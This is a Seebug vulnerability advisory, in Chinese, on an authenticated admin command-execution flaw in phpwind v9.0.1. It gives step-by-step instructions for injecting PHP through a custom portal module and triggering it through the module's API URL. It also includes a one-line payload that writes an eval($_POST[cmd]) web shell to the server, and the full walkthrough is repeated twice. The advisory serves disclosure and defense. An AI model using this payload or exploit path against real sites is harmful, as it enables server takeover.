phpwind命令执行getshell(后台)

2016-02-19T00:00:00
ID SSV:94465
Type seebug
Reporter Root
Modified 2016-02-19T00:00:00

Description

简要描述:

官网下载最新版

详细说明:

v9.0.1 搭建好,登陆

<img src="https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

在门户里选择页面管理,新增模块。自定义html

<img src="https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

写入phpinfo,提交,然后调用代码

<img src="https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

选择调用站外代,复制连接,访问 调用xml,json都可以。以xml为例,

<img src="https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml

<img src="https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

去掉xml,会执行phpinfo

<img src="https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

将代码换成

&lt;?php fputs(fopen("x.php","w"),"&lt;?eval(\$_POST[cmd]);?&gt;");?&gt;

重新访问可getshell

<img src="https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

v9.0.1 搭建好,登陆

<img src="https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

在门户里选择页面管理,新增模块。自定义html

<img src="https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

写入phpinfo,提交,然后调用代码

<img src="https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

选择调用站外代,复制连接,访问 调用xml,json都可以。以xml为例,

<img src="https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml

<img src="https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

去掉xml,会执行phpinfo

<img src="https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

将代码换成

&lt;?php fputs(fopen("x.php","w"),"&lt;?eval(\$_POST[cmd]);?&gt;");?&gt;

重新访问可getshell

<img src="https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png" alt="7.png" width="600" onerror="javascript:errimg(this);">